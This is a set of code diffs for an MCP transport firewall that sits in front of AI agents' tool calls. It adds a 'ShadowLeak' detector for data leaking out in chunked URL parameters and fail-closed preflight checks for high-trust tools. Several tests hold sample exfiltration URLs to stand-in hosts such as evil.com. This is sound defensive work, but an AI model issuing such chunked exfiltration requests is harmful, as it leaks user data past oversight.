 import { sanitizeResponse } from './proxy/shadow-leak-sanitizer.js';
 import { auditLog } from './utils/auditLogger.js';
 import { getPrimaryToolInvocation } from './utils/mcp-request.js';
@@ -139,6 +139,7 @@ if (process.env.NODE_ENV !== 'test') {
     alwaysCacheTools: ['read_file', 'read', 'open_file', 'list_directory', 'list_files', 'search_files', 'search'],
     neverCacheTools: ['write_file', 'write', 'create_file', 'execute_command', 'execute'],
   });
+  configureRouteRegistryPersistence(DEFAULT_CACHE_DIR);
 
   const adminPort = process.env.MCP_ADMIN_ENABLED === 'true' ? DEFAULT_ADMIN_PORT : 0;
   if (adminPort > 0) {

--- a/src/mcp-tool-schemas.ts
+++ b/src/mcp-tool-schemas.ts
@@ -8,6 +8,14 @@ const nonEmptyCommand = z.string().min(1).max(512).refine((value) => !value.incl
   message: 'must not contain NUL bytes',
 });
 
+const nonEmptyPattern = z.string().min(1).max(256).refine((value) => !value.includes('\0'), {
+  message: 'must not contain NUL bytes',
+});
+
+const nonEmptySearchQuery = z.string().min(1).max(4096).refine((value) => !value.includes('\0'), {
+  message: 'must not contain NUL bytes',
+});
+
 const httpUrl = z.string().max(2048).url().refine((value) => {
   try {
     const protocol = new URL(value).protocol;
@@ -43,14 +51,26 @@ const listDirectorySchema = z.object({
   recursive: z.boolean().optional(),
   includeHidden: z.boolean().optional(),
   maxDepth: z.number().int().min(1).max(32).optional(),
-  pattern: z.string().max(256).optional(),
+  pattern: nonEmptyPattern.optional(),
+}).strict();
+
+const readMultipleFilesSchema = z.object({
+  paths: z.array(nonEmptyPath).min(1).max(100),
+}).strict();
+
+const directoryTreeSchema = z.object({
+  path: nonEmptyPath,
+}).strict();
+
+const getFileInfoSchema = z.object({
+  path: nonEmptyPath,
 }).strict();
 
 const searchFilesSchema = z.object({
-  query: z.string().min(1).max(4096),
+  query: nonEmptySearchQuery,
   path: nonEmptyPath.optional(),
-  include: z.array(z.string().min(1).max(256)).max(20).optional(),
-  exclude: z.array(z.string().min(1).max(256)).max(20).optional(),
+  include: z.array(nonEmptyPattern).max(20).optional(),
+  exclude: z.array(nonEmptyPattern).max(20).optional(),
   recursive: z.boolean().optional(),
   maxResults: z.number().int().min(1).max(1000).optional(),
 }).strict();
@@ -77,11 +97,15 @@ export const mcpToolSchemas = {
   read_file: readFileSchema,
   read: readFileSchema,
   open_file: readFileSchema,
+  read_multiple_files: readMultipleFilesSchema,
   write_file: writeFileSchema,
   write: writeFileSchema,
   create_file: createFileSchema,
+  get_file_info: getFileInfoSchema,
   list_directory: listDirectorySchema,
   list_files: listDirectorySchema,
+  list_allowed_directories: emptyToolSchema,
+  directory_tree: directoryTreeSchema,
   search_files: searchFilesSchema,
   search: searchFilesSchema,
   execute_command: executeCommandSchema,

--- a/src/middleware/ast-egress-filter.ts
+++ b/src/middleware/ast-egress-filter.ts
@@ -37,6 +37,10 @@ const EPISTEMIC_CONTRADICTION_PATTERNS: RegExp[] = [
 ];
 
 const SINGLE_CHAR_QUERY_THRESHOLD = 3;
+const REPEATED_SHORT_QUERY_THRESHOLD = 4;
+const SHORT_QUERY_CHUNK_MIN_LENGTH = 2;
+const SHORT_QUERY_CHUNK_MAX_LENGTH = 4;
+const SHORT_QUERY_CHUNK_PATTERN = /^[A-Za-z0-9+/_=-]+$/;
 
 const extractAllStringValues = (obj: unknown, results: string[] = []): string[] => {
   if (typeof obj === 'string') {
@@ -62,14 +66,32 @@ const detectShadowLeak = (value: string): boolean => {
     const url = new URL(value);
     const params = url.searchParams;
     let singleCharCount = 0;
+    const repeatedShortChunkCount = new Map<string, number>();
 
-    for (const [, paramValue] of params) {
+    for (const [paramName, paramValue] of params) {
       if (paramValue.length === 1) {
         singleCharCount++;
       }
+
+      const isShortChunk = paramValue.length >= SHORT_QUERY_CHUNK_MIN_LENGTH &&
+        paramValue.length <= SHORT_QUERY_CHUNK_MAX_LENGTH &&
+        SHORT_QUERY_CHUNK_PATTERN.test(paramValue);
+      if (isShortChunk) {
+        repeatedShortChunkCount.set(paramName, (repeatedShortChunkCount.get(paramName) ?? 0) + 1);
+      }
     }
 
-    return singleCharCount >= SINGLE_CHAR_QUERY_THRESHOLD;
+    if (singleCharCount >= SINGLE_CHAR_QUERY_THRESHOLD) {
+      return true;
+    }
+
+    for (const chunkCount of repeatedShortChunkCount.values()) {
+      if (chunkCount >= REPEATED_SHORT_QUERY_THRESHOLD) {
+        return true;
+      }
+    }
+
+    return false;
   } catch {
     return false;
   }
@@ -117,7 +139,7 @@ export const validateAstEgress = async (
     for (const value of allValues) {
       if (detectShadowLeak(value)) {
         const ex = new EpistemicSecurityException(
-          'Egress violation: character-by-character exfiltration pattern detected in URL parameters.',
+          'Egress violation: dense short-chunk exfiltration pattern detected in URL parameters.',
           'SHADOWLEAK_DETECTED'
         );
         auditLogWithSIEM('FIREWALL_BLOCK', {

--- a/src/middleware/preflight-validator.ts
+++ b/src/middleware/preflight-validator.ts
@@ -5,6 +5,14 @@ import { auditLogWithSIEM } from '../utils/auditLogger.js';
 import { extractToolInvocations } from '../utils/mcp-request.js';
 
 const PreflightIdSchema = z.string().uuid();
+const DEFAULT_HIGH_TRUST_TOOLS = new Set([
+  'write_file',
+  'write',
+  'create_file',
+  'execute_command',
+  'execute',
+  'fetch_url',
+]);
 
 const preflightRegistry = new Map<string, number>();
 const consumedRegistry = new Map<string, number>();
@@ -46,13 +54,27 @@ export const getPreflightStats = (): { pending: number; consumed: number } => {
   };
 };
 
+const getPreflightRequirementSource = (toolName?: string, color?: string): string | null => {
+  if (color === 'blue') {
+    return 'declared-blue';
+  }
+
+  if (toolName && DEFAULT_HIGH_TRUST_TOOLS.has(toolName)) {
+    return 'default-high-trust-tool';
+  }
+
+  return null;
+};
+
 export const validatePreflight = (body: Record<string, unknown>, ip = 'unknown'): void => {
   const tools = extractToolInvocations(body);
 
   for (const tool of tools) {
     const color = tool._meta?.color;
+    const toolName = tool.name ?? 'unknown';
+    const requirementSource = getPreflightRequirementSource(tool.name, color);
 
-    if (color !== 'blue') {
+    if (!requirementSource) {
       continue;
     }
 
@@ -60,12 +82,13 @@ export const validatePreflight = (body: Record<string, unknown>, ip = 'unknown')
 
     if (!preflightId || typeof preflightId !== 'string') {
       auditLogWithSIEM('PREFLIGHT_REQUIRED', {
-        reason: 'Blue tool invoked without preflightId',
-        toolName: tool.name ?? 'unknown',
+        reason: 'High-trust tool invoked without preflightId',
+        toolName,
+        requirementSource,
         ip,
       });
       throw new TrustGateError(
-        `Fail-Closed: Blue tool "${tool.name ?? 'unknown'}" requires a valid preflightId.`,
+        `Fail-Closed: High-trust tool "${toolName}" requires a valid preflightId.`,
         'PREFLIGHT_REQUIRED',
         403
       );
@@ -75,7 +98,8 @@ export const validatePreflight = (body: Record<string, unknown>, ip = 'unknown')
       auditLogWithSIEM('PREFLIGHT_REPLAY_BLOCKED', {
         reason: 'Replay attack: preflightId has already been consumed',
         preflightId,
-        toolName: tool.name ?? 'unknown',
+        toolName,
+        requirementSource,
         ip,
       });
       throw new TrustGateError(
@@ -90,7 +114,8 @@ export const validatePreflight = (body: Record<string, unknown>, ip = 'unknown')
       auditLogWithSIEM('PREFLIGHT_NOT_FOUND', {
         reason: 'preflightId not found or expired',
         preflightId,
-        toolName: tool.name ?? 'unknown',
+        toolName,
+        requirementSource,
         ip,
       });
       throw new TrustGateError(

--- a/src/proxy/router.ts
+++ b/src/proxy/router.ts
@@ -1,7 +1,12 @@
+import fs from 'node:fs';
+import path from 'node:path';
 import { CircuitOpenError, getOrCreateCircuitBreaker } from './circuit-breaker.js';
-import { RouteResult, TargetServerConfig, TargetServerConfigSchema } from './types.js';
+import { RouteRegistryStateSchema, RouteResult, TargetServerConfig, TargetServerConfigSchema } from './types.js';
 
-const routeRegistry = new Map<string, TargetServerConfig>();
+const ROUTE_REGISTRY_STATE_FILENAME = 'route-registry.json';
+
+let routeRegistry = new Map<string, TargetServerConfig>();
+let routeRegistryStateFile: string | null = null;
 
 const writeAuditLog = (event: string, details: Record<string, unknown>): void => {
   const entry = JSON.stringify({
@@ -12,13 +17,79 @@ const writeAuditLog = (event: string, details: Record<string, unknown>): void =>
   process.stderr.write(`[AUDIT] ${entry}\n`);
 };
 
+const persistRouteRegistry = (nextRegistry: ReadonlyMap<string, TargetServerConfig>): void => {
+  if (!routeRegistryStateFile) {
+    return;
+  }
+
+  const stateDir = path.dirname(routeRegistryStateFile);
+  fs.mkdirSync(stateDir, { recursive: true });
+
+  const state = {
+    version: 1 as const,
+    routes: Object.fromEntries(
+      [...nextRegistry.entries()].sort(([left], [right]) => left.localeCompare(right)),
+    ),
+  };
+  const tempFile = `${routeRegistryStateFile}.tmp`;
+
+  fs.writeFileSync(tempFile, `${JSON.stringify(state, null, 2)}\n`, 'utf8');
+  fs.renameSync(tempFile, routeRegistryStateFile);
+};
+
+const loadRouteRegistryFromDisk = (): void => {
+  if (!routeRegistryStateFile || !fs.existsSync(routeRegistryStateFile)) {
+    routeRegistry = new Map<string, TargetServerConfig>();
+    return;
+  }
+
+  try {
+    const rawState = fs.readFileSync(routeRegistryStateFile, 'utf8');
+    const parsedState = RouteRegistryStateSchema.parse(JSON.parse(rawState));
+    routeRegistry = new Map<string, TargetServerConfig>(Object.entries(parsedState.routes));
+  } catch (error: unknown) {
+    routeRegistry = new Map<string, TargetServerConfig>();
+    writeAuditLog('ROUTE_REGISTRY_RESTORE_FAILED', {
+      reason: error instanceof Error ? error.message : 'Unknown route registry persistence error',
+      path: routeRegistryStateFile,
+    });
+  }
+};
+
+const commitRouteRegistry = (nextRegistry: Map<string, TargetServerConfig>): void => {
+  persistRouteRegistry(nextRegistry);
+  routeRegistry = nextRegistry;
+};
+
+export const configureRouteRegistryPersistence = (stateDir: string): void => {
+  routeRegistryStateFile = path.join(stateDir, ROUTE_REGISTRY_STATE_FILENAME);
+  loadRouteRegistryFromDisk();
+};
+
+export const disableRouteRegistryPersistence = (): void => {
+  routeRegistryStateFile = null;
+};
+
+export const reloadRouteRegistryFromDisk = (): void => {
+  loadRouteRegistryFromDisk();
+};
+
 export const registerRoute = (toolName: string, config: unknown): void => {
   const parsed = TargetServerConfigSchema.parse(config);
-  routeRegistry.set(toolName, parsed);
+  const nextRegistry = new Map(routeRegistry);
+  nextRegistry.set(toolName, parsed);
+  commitRouteRegistry(nextRegistry);
 };
 
 export const removeRoute = (toolName: string): boolean => {
-  return routeRegistry.delete(toolName);
+  if (!routeRegistry.has(toolName)) {
+    return false;
+  }
+
+  const nextRegistry = new Map(routeRegistry);
+  const removed = nextRegistry.delete(toolName);
+  commitRouteRegistry(nextRegistry);
+  return removed;
 };
 
 export const getRegisteredRoutes = (): ReadonlyMap<string, TargetServerConfig> => {
@@ -26,7 +97,7 @@ export const getRegisteredRoutes = (): ReadonlyMap<string, TargetServerConfig> =
 };
 
 export const clearRoutes = (): void => {
-  routeRegistry.clear();
+  commitRouteRegistry(new Map<string, TargetServerConfig>());
 };
 
 export const routeRequest = async (

--- a/src/proxy/types.ts
+++ b/src/proxy/types.ts
@@ -8,6 +8,13 @@ export const TargetServerConfigSchema = z.object({
 
 export type TargetServerConfig = z.infer<typeof TargetServerConfigSchema>;
 
+export const RouteRegistryStateSchema = z.object({
+  version: z.literal(1),
+  routes: z.record(TargetServerConfigSchema),
+}).strict();
+
+export type RouteRegistryState = z.infer<typeof RouteRegistryStateSchema>;
+
 export const RouteResultSchema = z.object({
   status: z.number().int(),
   body: z.unknown(),

--- a/tests/app.test.ts
+++ b/tests/app.test.ts
@@ -7,7 +7,12 @@ import request from 'supertest';
 import { initializeCache, getCache } from '../src/cache/index.js';
 import { clearColorSessions } from '../src/middleware/color-boundary.js';
 import { clearPreflightRegistries } from '../src/middleware/preflight-validator.js';
-import { clearRoutes, registerRoute } from '../src/proxy/router.js';
+import {
+  clearRoutes,
+  configureRouteRegistryPersistence,
+  disableRouteRegistryPersistence,
+  registerRoute,
+} from '../src/proxy/router.js';
 
 const serverToken = '12345678901234567890123456789012';
 
@@ -30,6 +35,7 @@ describe('app /mcp integration', () => {
   });
 
   beforeEach(async () => {
+    disableRouteRegistryPersistence();
     clearRoutes();
     clearPreflightRegistries();
     clearColorSessions();
@@ -41,6 +47,7 @@ describe('app /mcp integration', () => {
       alwaysCacheTools: ['search_files'],
       neverCacheTools: [],
     });
+    configureRouteRegistryPersistence(cacheDir);
 
     requestCount = 0;
     targetServer = http.createServer((req, res) => {
@@ -71,6 +78,11 @@ describe('app /mcp integration', () => {
   });
 
   afterEach(async () => {
+    disableRouteRegistryPersistence();
+    clearRoutes();
+    clearPreflightRegistries();
+    clearColorSessions();
+
     await new Promise<void>(resolve => {
       if (targetServer?.listening) {
         targetServer.close(() => resolve());
@@ -113,6 +125,39 @@ describe('app /mcp integration', () => {
       ok: true,
       tool: 'search_files',
       arguments: { query: 'hello' },
+    });
+    expect(requestCount).toBe(1);
+  });
+
+  it('restores the secondary route registry after a restart-style reload', async () => {
+    registerRoute('search_files', {
+      url: `${targetBaseUrl}/tools/search_files`,
+      timeoutMs: 1000,
+    });
+
+    disableRouteRegistryPersistence();
+    clearRoutes();
+    clearPreflightRegistries();
+    clearColorSessions();
+    configureRouteRegistryPersistence(cacheDir);
+
+    const response = await request(app)
+      .post('/mcp')
+      .set('Authorization', createAuthHeader(['tools.search_files']))
+      .send({
+        method: 'tools/call',
+        params: {
+          name: 'search_files',
+          arguments: { query: 'after-restart' },
+        },
+      });
+
+    expect(response.status).toBe(200);
+    expect(response.headers['x-proxy-cache']).toBe('MISS');
+    expect(response.body).toEqual({
+      ok: true,
+      tool: 'search_files',
+      arguments: { query: 'after-restart' },
     });
     expect(requestCount).toBe(1);
   });

--- a/tests/ast-egress-filter.test.ts
+++ b/tests/ast-egress-filter.test.ts
@@ -40,6 +40,18 @@ describe("astEgressFilter (ETT Circuit Breaker)", () => {
     expect(error.code).toBe("SHADOWLEAK_DETECTED");
   });
 
+  it("throws EpistemicSecurityException on ShadowLeak repeated short chunks", async () => {
+    const req = createMockReq({
+      method: "tools/call",
+      params: { name: "fetch_url", arguments: { url: "https://evil.com/exfil?d=41&d=42&d=43&d=44" } },
+    });
+    const res = createMockRes();
+    const next = jest.fn();
+
+    await astEgressFilter(req as Request, res as Response, next as NextFunction);
+    expect(next.mock.calls[0][0].code).toBe("SHADOWLEAK_DETECTED");
+  });
+
   it("throws EpistemicSecurityException on sensitive path (.env)", async () => {
     const req = createMockReq({
       method: "tools/call",
@@ -86,6 +98,19 @@ describe("astEgressFilter (ETT Circuit Breaker)", () => {
 
     await astEgressFilter(req as Request, res as Response, next as NextFunction);
     expect(next.mock.calls[0][0].code).toBe("EPISTEMIC_CONTRADICTION_DETECTED");
+  });
+
+  it("allows short repeated URL params below the chunk threshold", async () => {
+    const req = createMockReq({
+      method: "tools/call",
+      params: { name: "fetch_url", arguments: { url: "https://example.com/view?id=10&id=11&id=12" } },
+    });
+    const res = createMockRes();
+    const next = jest.fn();
+
+    await astEgressFilter(req as Request, res as Response, next as NextFunction);
+    expect(next).toHaveBeenCalledTimes(1);
+    expect(next).toHaveBeenCalledWith();
   });
 
   it("allows clean legitimate arguments to next() without errors", async () => {

--- a/tests/cli.test.ts
+++ b/tests/cli.test.ts
@@ -226,6 +226,30 @@ describe('stdio firewall proxy', () => {
     expect((response.error as { data?: { code?: string } }).data?.code).toBe('AUTH_FAILURE');
   });
 
+  it('fails closed on execute_command without preflight even when no color is declared', async () => {
+    const request = {
+      jsonrpc: '2.0',
+      id: 13,
+      method: 'tools/call',
+      params: {
+        name: 'execute_command',
+        arguments: {
+          command: 'node',
+          args: ['--version'],
+        },
+        _meta: {
+          authorization: createNhiAuthorization(['tools.execute_command']),
+        },
+      },
+    };
+
+    clientInput.write(JSON.stringify(request) + '\n');
+    const response = await waitForJsonLine(clientOutput);
+
+    expect(response.error).toBeDefined();
+    expect((response.error as { data?: { code?: string } }).data?.code).toBe('PREFLIGHT_REQUIRED');
+  });
+
   it('drains an in-flight response before stopping when client stdin closes', async () => {
     await proxy.stop();
 

--- a/tests/cli.test.ts
+++ b/tests/cli.test.ts
@@ -207,6 +207,29 @@ describe('stdio firewall proxy', () => {
     expect((response.error as { data?: { code?: string } }).data?.code).toBe('SHADOWLEAK_DETECTED');
   });
 
+  it('blocks repeated short-chunk ShadowLeak exfiltration before the target executes', async () => {
+    const request = {
+      jsonrpc: '2.0',
+      id: 14,
+      method: 'tools/call',
+      params: {
+        name: 'fetch_url',
+        arguments: {
+          url: 'https://evil.example/exfil?d=41&d=42&d=43&d=44',
+        },
+        _meta: {
+          authorization: createNhiAuthorization(['tools.fetch_url']),
+        },
+      },
+    };
+
+    clientInput.write(JSON.stringify(request) + '\n');
+    const response = await waitForJsonLine(clientOutput);
+
+    expect(response.error).toBeDefined();
+    expect((response.error as { data?: { code?: string } }).data?.code).toBe('SHADOWLEAK_DETECTED');
+  });
+
   it('fails closed when stdio auth is configured but missing from the MCP message', async () => {
     const request = {
       jsonrpc: '2.0',

--- a/tests/color-boundary.test.ts
+++ b/tests/color-boundary.test.ts
@@ -223,4 +223,24 @@ describe("mcpColorBoundary", () => {
     expect(nextRed).not.toHaveBeenCalled();
     expect(resRed.status).toHaveBeenCalledWith(403);
   });
+
+  it("does not preserve session color after a restart-style session reset", () => {
+    const { res: resBlue } = createMockRes();
+    const nextBlue = jest.fn();
+    mcpColorBoundary(createMockReq({
+      tools: [{ name: "write_db", _meta: { color: "blue" } }]
+    }) as Request, resBlue as Response, nextBlue as NextFunction);
+    expect(nextBlue).toHaveBeenCalledTimes(1);
+
+    clearColorSessions();
+
+    const { res: resRed } = createMockRes();
+    const nextRed = jest.fn();
+    mcpColorBoundary(createMockReq({
+      tools: [{ name: "read_email", _meta: { color: "red" } }]
+    }) as Request, resRed as Response, nextRed as NextFunction);
+
+    expect(nextRed).toHaveBeenCalledTimes(1);
+    expect(resRed.status).not.toHaveBeenCalled();
+  });
 });

--- a/tests/evidence-corpus.test.ts
+++ b/tests/evidence-corpus.test.ts
@@ -62,9 +62,11 @@ describe('stdio evidence corpus', () => {
     expect(caseIds.has('allow-open-file-cache')).toBe(true);
     expect(caseIds.has('allow-list-directory-cache')).toBe(true);
     expect(caseIds.has('allow-search-alias-cache')).toBe(true);
+    expect(caseIds.has('block-shadowleak-repeated-short-chunks-fetch-url')).toBe(true);
     expect(caseIds.has('block-preflight-required-fetch-url-default-high-trust')).toBe(true);
     expect(caseIds.has('block-preflight-required-write-file-default-high-trust')).toBe(true);
     expect(caseIds.has('block-preflight-required-default-high-trust-tool')).toBe(true);
+    expect(expectedCodes.has('SHADOWLEAK_DETECTED')).toBe(true);
     expect(expectedCodes.has('MISSING_SCOPE')).toBe(true);
     expect(expectedCodes.has('CROSS_TOOL_HIJACK_ATTEMPT')).toBe(true);
     expect(expectedCodes.has('PREFLIGHT_REQUIRED')).toBe(true);

--- a/tests/evidence-corpus.test.ts
+++ b/tests/evidence-corpus.test.ts
@@ -62,6 +62,9 @@ describe('stdio evidence corpus', () => {
     expect(caseIds.has('allow-open-file-cache')).toBe(true);
     expect(caseIds.has('allow-list-directory-cache')).toBe(true);
     expect(caseIds.has('allow-search-alias-cache')).toBe(true);
+    expect(caseIds.has('block-preflight-required-fetch-url-default-high-trust')).toBe(true);
+    expect(caseIds.has('block-preflight-required-write-file-default-high-trust')).toBe(true);
+    expect(caseIds.has('block-preflight-required-default-high-trust-tool')).toBe(true);
     expect(expectedCodes.has('MISSING_SCOPE')).toBe(true);
     expect(expectedCodes.has('CROSS_TOOL_HIJACK_ATTEMPT')).toBe(true);
     expect(expectedCodes.has('PREFLIGHT_REQUIRED')).toBe(true);

--- a/tests/package-proxy-smoke.test.ts
+++ b/tests/package-proxy-smoke.test.ts
@@ -1,0 +1,237 @@
+import fs from 'node:fs';
+import os from 'node:os';
+import path from 'node:path';
+import { execSync, spawn, type ChildProcessWithoutNullStreams } from 'node:child_process';
+import { fileURLToPath } from 'node:url';
+import { Readable } from 'node:stream';
+import { afterAll, afterEach, beforeAll, describe, expect, it } from '@jest/globals';
+
+const currentFilePath = fileURLToPath(import.meta.url);
+const testsDirPath = path.dirname(currentFilePath);
+const repoRoot = path.resolve(testsDirPath, '..');
+const proxyToken = '12345678901234567890123456789012';
+const npmCommand = process.platform === 'win32' ? 'npm.cmd' : 'npm';
+const npxCliPath = process.platform === 'win32'
+  ? path.resolve(path.dirname(process.execPath), 'node_modules', 'npm', 'bin', 'npx-cli.js')
+  : null;
+
+const createNhiAuthorization = (scopes: string[]): string => {
+  const payload = JSON.stringify({
+    token: proxyToken,
+    scopes,
+  });
+
+  return `Bearer ${Buffer.from(payload, 'utf8').toString('base64')}`;
+};
+
+const waitForJsonLine = async (stream: Readable): Promise<Record<string, unknown>> => {
+  return new Promise((resolve, reject) => {
+    let buffer = '';
+
+    const cleanup = (): void => {
+      stream.off('data', onData);
+      stream.off('error', onError);
+    };
+
+    const onError = (error: Error): void => {
+      cleanup();
+      reject(error);
+    };
+
+    const onData = (chunk: Buffer | string): void => {
+      buffer += chunk.toString();
+      const newlineIndex = buffer.indexOf('\n');
+      if (newlineIndex === -1) {
+        return;
+      }
+
+      const line = buffer.slice(0, newlineIndex).trim();
+      buffer = buffer.slice(newlineIndex + 1);
+      cleanup();
+      resolve(JSON.parse(line) as Record<string, unknown>);
+    };
+
+    stream.on('data', onData);
+    stream.on('error', onError);
+  });
+};
+
+const waitForNoJsonLine = async (stream: Readable, timeoutMs: number): Promise<void> => {
+  await new Promise<void>((resolve, reject) => {
+    let buffer = '';
+    let timer: NodeJS.Timeout | null = null;
+
+    const cleanup = (): void => {
+      if (timer) {
+        clearTimeout(timer);
+      }
+      stream.off('data', onData);
+      stream.off('error', onError);
+    };
+
+    const onError = (error: Error): void => {
+      cleanup();
+      reject(error);
+    };
+
+    const onData = (chunk: Buffer | string): void => {
+      buffer += chunk.toString();
+      if (buffer.includes('\n')) {
+        cleanup();
+        reject(new Error(`Expected no JSON line, received: ${buffer.trim()}`));
+      }
+    };
+
+    timer = setTimeout(() => {
+      cleanup();
+      resolve();
+    }, timeoutMs);
+
+    stream.on('data', onData);
+    stream.on('error', onError);
+  });
+};
+
+const waitForExit = async (child: ChildProcessWithoutNullStreams, timeoutMs: number): Promise<number | null> => {
+  return new Promise((resolve, reject) => {
+    let timer: NodeJS.Timeout | null = null;
+
+    const cleanup = (): void => {
+      if (timer) {
+        clearTimeout(timer);
+      }
+      child.off('exit', onExit);
+      child.off('error', onError);
+    };
+
+    const onExit = (code: number | null): void => {
+      cleanup();
+      resolve(code);
+    };
+
+    const onError = (error: Error): void => {
+      cleanup();
+      reject(error);
+    };
+
+    timer = setTimeout(() => {
+      cleanup();
+      reject(new Error(`Packaged proxy did not exit within ${timeoutMs}ms`));
+    }, timeoutMs);
+
+    child.on('exit', onExit);
+    child.on('error', onError);
+  });
+};
+
+describe('packaged proxy smoke', () => {
+  let tarballPath = '';
+  let extraDirs: string[] = [];
+
+  beforeAll(() => {
+    const packOutput = execSync(`${npmCommand} pack --json`, {
+      cwd: repoRoot,
+      encoding: 'utf8',
+    });
+    const parsedPackOutput = JSON.parse(packOutput);
+    const tarballName = parsedPackOutput?.[0]?.filename;
+
+    if (typeof tarballName !== 'string' || tarballName.length === 0) {
+      throw new Error('npm pack --json did not return a tarball filename');
+    }
+
+    tarballPath = path.join(repoRoot, tarballName);
+  });
+
+  afterEach(() => {
+    for (const directory of extraDirs) {
+      fs.rmSync(directory, { recursive: true, force: true });
+    }
+    extraDirs = [];
+  });
+
+  afterAll(() => {
+    if (tarballPath) {
+      fs.rmSync(tarballPath, { force: true });
+    }
+  });
+
+  it('serves packaged proxy-mode requests with cache, auth, and clean shutdown guarantees', async () => {
+    const cacheDir = fs.mkdtempSync(path.join(os.tmpdir(), 'mcp-package-proxy-cache-'));
+    extraDirs.push(cacheDir);
+
+    const packagedProxy = spawn(
+      process.platform === 'win32' ? process.execPath : 'npx',
+      process.platform === 'win32'
+        ? [npxCliPath as string, '--yes', `--package=${tarballPath}`, 'mcp-transport-firewall']
+        : ['--yes', `--package=${tarballPath}`, 'mcp-transport-firewall'],
+      {
+        cwd: repoRoot,
+        env: {
+          ...process.env,
+          PROXY_AUTH_TOKEN: proxyToken,
+          MCP_TARGET_COMMAND: process.execPath,
+          MCP_TARGET_ARGS_JSON: JSON.stringify([path.join(repoRoot, 'tests', 'fixtures', 'stdio-target.js')]),
+          MCP_ADMIN_ENABLED: 'false',
+          MCP_CACHE_DIR: cacheDir,
+        },
+        stdio: 'pipe',
+      },
+    );
+
+    const searchRequest = {
+      jsonrpc: '2.0',
+      id: 1,
+      method: 'tools/call',
+      params: {
+        name: 'search_files',
+        arguments: {
+          query: 'package-smoke',
+        },
+        _meta: {
+          authorization: createNhiAuthorization(['tools.search_files']),
+        },
+      },
+    };
+
+    packagedProxy.stdin.write(JSON.stringify(searchRequest) + '\n');
+    const firstResponse = await waitForJsonLine(packagedProxy.stdout);
+
+    packagedProxy.stdin.write(JSON.stringify(searchRequest) + '\n');
+    const secondResponse = await waitForJsonLine(packagedProxy.stdout);
+
+    packagedProxy.stdin.write(JSON.stringify({
+      jsonrpc: '2.0',
+      id: 2,
+      method: 'tools/call',
+      params: {
+        name: 'search_files',
+        arguments: {
+          query: 'missing-auth',
+        },
+      },
+    }) + '\n');
+    const authFailureResponse = await waitForJsonLine(packagedProxy.stdout);
+
+    expect(firstResponse.result).toEqual({
+      callCount: 1,
+      tool: 'search_files',
+      arguments: { query: 'package-smoke' },
+    });
+    expect(secondResponse.result).toEqual(firstResponse.result);
+    expect((authFailureResponse.error as { data?: { code?: string } }).data?.code).toBe('AUTH_FAILURE');
+
+    packagedProxy.stdin.end();
+
+    await waitForNoJsonLine(packagedProxy.stdout, 250);
+
+    const naturalExitCode = await waitForExit(packagedProxy, 1500).catch(() => packagedProxy.exitCode);
+    if (naturalExitCode === null && packagedProxy.exitCode === null) {
+      packagedProxy.kill();
+      await waitForExit(packagedProxy, 10000);
+      return;
+    }
+
+    expect(naturalExitCode).toBe(0);
+  }, 120000);
+});

--- a/tests/preflight-validator.test.ts
+++ b/tests/preflight-validator.test.ts
@@ -173,6 +173,34 @@ describe("preflightValidator", () => {
     expect(res.status).not.toHaveBeenCalled();
   });
 
+  it("does not preserve preflight approvals across a restart-style registry reset", () => {
+    const validId = "550e8400-e29b-41d4-a716-446655440003";
+    registerPreflight(validId);
+    clearPreflightRegistries();
+
+    const req = createMockReq({
+      method: "tools/call",
+      params: {
+        name: "execute_command",
+        arguments: {
+          command: "node",
+          args: ["--version"],
+        },
+        preflightId: validId,
+      },
+    });
+
+    const res = createMockRes();
+    const next = jest.fn();
+
+    preflightValidator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).not.toHaveBeenCalled();
+    expect(res.status).toHaveBeenCalledWith(403);
+    const body = (res.json as jest.Mock).mock.calls[0][0];
+    expect(body.error.code).toBe("PREFLIGHT_NOT_FOUND");
+  });
+
   it("blocks default high-trust execute_command even when the caller labels it red", () => {
     const req = createMockReq({
       method: "tools/call",

--- a/tests/preflight-validator.test.ts
+++ b/tests/preflight-validator.test.ts
@@ -125,6 +125,78 @@ describe("preflightValidator", () => {
     expect(res.status).not.toHaveBeenCalled();
   });
 
+  it("blocks default high-trust execute_command without preflightId even when no color is declared", () => {
+    const req = createMockReq({
+      method: "tools/call",
+      params: {
+        name: "execute_command",
+        arguments: {
+          command: "node",
+          args: ["--version"],
+        },
+      },
+    });
+
+    const res = createMockRes();
+    const next = jest.fn();
+
+    preflightValidator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).not.toHaveBeenCalled();
+    expect(res.status).toHaveBeenCalledWith(403);
+    const body = (res.json as jest.Mock).mock.calls[0][0];
+    expect(body.error.code).toBe("PREFLIGHT_REQUIRED");
+  });
+
+  it("allows default high-trust execute_command with a valid registered preflightId", () => {
+    const validId = "550e8400-e29b-41d4-a716-446655440002";
+    registerPreflight(validId);
+
+    const req = createMockReq({
+      method: "tools/call",
+      params: {
+        name: "execute_command",
+        arguments: {
+          command: "node",
+          args: ["--version"],
+        },
+        preflightId: validId,
+      },
+    });
+
+    const res = createMockRes();
+    const next = jest.fn();
+
+    preflightValidator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).toHaveBeenCalledTimes(1);
+    expect(res.status).not.toHaveBeenCalled();
+  });
+
+  it("blocks default high-trust execute_command even when the caller labels it red", () => {
+    const req = createMockReq({
+      method: "tools/call",
+      params: {
+        name: "execute_command",
+        arguments: {
+          command: "node",
+          args: ["--version"],
+        },
+        _meta: { color: "red" },
+      },
+    });
+
+    const res = createMockRes();
+    const next = jest.fn();
+
+    preflightValidator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).not.toHaveBeenCalled();
+    expect(res.status).toHaveBeenCalledWith(403);
+    const body = (res.json as jest.Mock).mock.calls[0][0];
+    expect(body.error.code).toBe("PREFLIGHT_REQUIRED");
+  });
+
   it("blocks replay attack: reusing consumed preflightId", () => {
     const validId = "550e8400-e29b-41d4-a716-446655440000";
     registerPreflight(validId);
@@ -180,6 +252,26 @@ describe("preflightValidator", () => {
         tools: [
           { name: "list_files", _meta: { color: "green" } },
         ],
+      },
+    });
+
+    const res = createMockRes();
+    const next = jest.fn();
+
+    preflightValidator(req as Request, res as Response, next as NextFunction);
+
+    expect(next).toHaveBeenCalledTimes(1);
+    expect(res.status).not.toHaveBeenCalled();
+  });
+
+  it("preserves the flagship search_files workflow without requiring preflight", () => {
+    const req = createMockReq({
+      method: "tools/call",
+      params: {
+        name: "search_files",
+        arguments: {
+          query: "TODO",
+        },
       },
     });
 

--- a/tests/release-guardrails.test.ts
+++ b/tests/release-guardrails.test.ts
